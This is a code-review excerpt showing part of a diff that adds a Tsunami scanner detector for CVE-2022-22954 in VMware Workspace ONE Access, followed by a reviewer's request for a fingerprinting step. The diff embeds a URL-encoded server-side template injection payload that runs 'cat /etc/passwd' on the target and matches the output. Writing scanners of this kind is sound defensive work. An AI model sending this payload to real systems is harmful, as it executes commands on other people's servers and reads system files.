community/detectors/vmware_cve_2022_22954/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202222954/Cve202222954VulnDetector.java

```diff
@@ -0,0 +1,165 @@
+import com.google.tsunami.common.time.UtcClock;
+import com.google.tsunami.plugin.PluginType;
+import com.google.tsunami.plugin.VulnDetector;
+import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.proto.DetectionReport;
+import com.google.tsunami.proto.DetectionReportList;
+import com.google.tsunami.proto.DetectionStatus;
+import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.Severity;
+import com.google.tsunami.proto.TargetInfo;
+import com.google.tsunami.proto.Vulnerability;
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.time.Clock;
+import java.time.Instant;
+import java.util.regex.Pattern;
+import javax.inject.Inject;
+
+/** A {@link VulnDetector} that detects the CVE-2022-22954 vulnerability. */
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "Cve202222954VulnDetector",
+    version = "0.1",
+    description =
+        "VMware Workspace ONE Access and Identity Manager contain a remote code execution "
+            + "vulnerability due to server-side template injection. A malicious actor with network "
+            + "access can trigger a server-side template injection that may result in remote code "
+            + "execution. ",
+    author = "hh-hunter",
+    bootstrapModule = Cve202222954DetectorBootstrapModule.class)
+public final class Cve202222954VulnDetector implements VulnDetector {
+
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+  private static final String CHECK_VUL_PATH =
+      "catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker%2Etemplate%2Eutility"
+          + "%2EExecute%22%3Fnew%28%29%28%22cat%20%2Fetc%2Fpasswd%22%29%7D";
+
+  @VisibleForTesting static final Pattern DETECTION_PATTERN = Pattern.compile("root:[x*]:0:0");
+
+  @VisibleForTesting
+  static final String VULN_DESCRIPTION =
+      "An unauthenticated attacker with network access could exploit this vulnerability by sending "
+          + "a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. "
+          + "Successful exploitation could result in remote code execution by exploiting a "
+          + "server-side template injection flaw";
+
+  private final HttpClient httpClient;
+  private final Clock utcClock;
+
+  @Inject
+  Cve202222954VulnDetector(
+      @UtcClock Clock utcClock, HttpClient httpClient) {
+    this.httpClient = checkNotNull(httpClient);
+    this.utcClock = checkNotNull(utcClock);
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("CVE-2921-22954 starts detecting.");
+
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(Cve202222954VulnDetector::isWebServiceOrUnknownService)
+                .filter(this::isServiceVulnerable)
```

Comment:
Please add some kind of fingerprinting step here to check if the target is VMWare One Access, Identity Manger, etc-